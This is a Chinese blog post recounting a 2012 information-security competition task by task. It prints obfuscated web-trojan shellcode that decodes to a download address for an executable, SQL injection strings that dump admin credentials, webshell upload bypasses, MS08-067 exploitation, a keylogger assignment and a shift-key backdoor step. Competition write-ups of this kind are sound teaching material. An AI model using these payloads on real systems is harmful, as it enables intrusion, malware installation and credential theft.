美文网首页
2012年蓝盾杯信息安全竞赛小记

2012年蓝盾杯信息安全竞赛小记

作者: tmdsb38 | 来源:发表于2015-10-31 19:58 被阅读204次

    竞赛基本要求:

    时间2012.12.02 9:00-14:00

    1>必须用简要文字描述操作的过程,以及保存操作截图。

    2>竞赛过程中参赛者不得通过任何途径连接互联网,违者取消比赛资格!

    操作题包含了web安全、主机安全、恶意程序、数据库安全和安全加固等方面的攻防题目,总15道大题,共100分。

    留此简单记录竞赛过程

    题目简析:

    1&2&3 网马解密

    0×01 初级网马

    var shellcode = unescape(“%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2e55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2f3a%u772f%u7777%u612e%u6870%u6361%u2e6b%u6f63%u2f6d%u7878%u6f6f%u742f%u6f62%u2e79%u7865%u0065%u0000″)

    解密得到网马地址

    0×02 中级网马

    var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\testSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];

    ShellCode="";

    ShellCode=ShellCode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI";

    ShellCode=ShellCode+"xkR0qJPJP3YY0fNYwLEQk0p47zpf"+"KRKJJKVe9xJKYoIoYolOoCQv";

    ShellCode=ShellCode+"3VsVwLuRKwRva"+"vbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB";

    ShellCode=ShellCode+"sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO";

    ShellCode=ShellCode+"NuKpTRr"+"NWOVYM5m"+"qqrwSMTn"+"oeoty08JM"+"nKJMgPw2p"+"ey5MgMWQuMw";

    ShellCode=ShellCode+"runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX";

    ShellCode=ShellCode+"HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK";

    ShellCode=ShellCode+"e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI";

    ShellCode=ShellCode+"5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ";

    ShellCode=ShellCode+"OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL";

    ShellCode=ShellCode+"gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5";

    ShellCode=ShellCode+"PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN";

    ShellCode=ShellCode+"eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw";

    ShellCode=ShellCode+"2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW";

    ShellCode=ShellCode+"qvRHptd4RPFZVOdoRWQgrWTnRL0l3FSQ2LQeautnasPntorN0bQhFNPeT8Quopwp";

    为alpha2的TYIIIIIIIIIIIIIIII加密,工具解密得到网马地址

    推荐MDecoder&Freshow

    0×03 高级网马

    没解出来,不贴了,期待官方解答

    4&5&6&7&8 Linux-PHP-Mysql-注入到上传&提权&留root后门账户

    注入

    http://xxoo/zcncms/?c=articles&a=show&id=9 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(username,0x5c,userpassword),15,16,17 from information_schema.COLUMNS where TABLE_NAME=0x7A636E5F7573657273 limit 2,1

    得到如下回显

    账户密码admin bdtboy007位置比较yd

    后台:http://xxoo/zcncms/admin_login/

    改包上传得到shell

    Linux,反弹www.2cto.com

    2.6.18,提权脚本上了几个,没成功,时间紧张,索性没继续。

    0×09

    http://xxoo/test.asp存在SQL注入漏洞,通过页面中提示,查询出数据库中一个MD5加密后的32位KEY值。

    mssql字符型注入

    id=1’having ‘1’=’1

    Group by继续

    得到的信息thekey.id thekey.here thekey.isnot

    没下文了

    0×10

    http://xxoo:81/upload.asp 页面存在上传漏洞,请上传一个可以正常访问的webshell

    抓包修改目录uploa1.asp

    http://192.168.2.27:81/uploa1.asp/JPG/GFtest/2-96365-ok1.jpg

    0×11

    下载辅助源码code.rar

    http://xxoo:82/ 站点上存在SQL注入漏洞。查询到管理账户名和密码。上传一个可以正常访问webshell。

    Asp注入,过滤and7种,AnD可以突破,当时没来及看题目,无细节。

    0×12

    下载辅助源码code.rar (其中有一个漏洞利用程序ec.html)

    获取站点http://xxoo:83/ecshop/

    后台管理账户/密码

    上传一个可以正常访问webshell

    在ec.heml 中构造注入语句:

    union select 1 from

    (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,user_name,0x3a,email) from users limit 0,1))a from information_schema.tables group by a)b#

    得到如下信息

    Id为1

    admintest1

    test@xian.com

    Password:3e69d9e576ba7fb036d9c7c38abf79e0

    队友说账号貌似无效,在挖get_password.php洞,有了一些信息,时间不够,没整完,也不贴了。

    0×13

    扫描远程服务器1,并对扫描结果中漏洞实施攻击,通过利用漏洞创建一个用户名为test(密码:test123)。以test用户远程登录服务器1。

    Nessus扫了下,MS08-067,Metaspolit得shell,创建账户test/test123。

    0×14

    使用计算机语言编写一个名称为hackbluedon键盘记录器,记录用户对键盘的所有操作。

    (远程服务器1已经安装好VC++开发环境,也可以使用自己电脑的开发环境)

    要求:将编写好的工具代码复制到服务器1桌面上并运行起来,并且呈现记录生成的文本(把自动生成记录日志为xabd.log,存放路径为C:\目录下)(填写记录本队名称日志截图)

    编一个KeyLogger

    0×15 安全加固

    以用户administrator(密码123456)登录上服务器1。

    <1>关闭登录时显示上一次用户名。

    <2>创建一个密码为test123的shift后门。

    <3>修改远程登录端口为12345。

    <4>修改ping时的TTL值为222。

    <5>创建IP安全策略:禁止ping该服务器。

    <6>通过修改本地策略禁止远程用户修改注册表。

    要求截图,过程

    1.修改本地安全策略

    Don display last user name

    设置为enable

    3.修改登陆端口

    修改注册表

    HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/WDS/RDPWD/TDS/TCP

    HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/WINSTATIONS/RDP-TCP/

    修改PortNumber为12345

    4.修改ttl为222

    修改注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

    5.创建ip策略,创建规则

    可参考http://www.jb51.net/article/19479.htm

    6.禁止远程修改注册表

    在services.msc中启动Remote Registry

    /*

    结果不错,拿了一等奖

    也有不少收获

    蓝盾的大大搭环境也辛苦了

    小生深有体会

    存此记录

    2012.12

    */

    点击复制链接 与好友分享!回本站首页

    上一篇:对我们医院的网络安全

    相关文章

      网友评论

          本文标题:2012年蓝盾杯信息安全竞赛小记

          本文链接:https://www.haomeiwen.com/subject/oezfhttx.html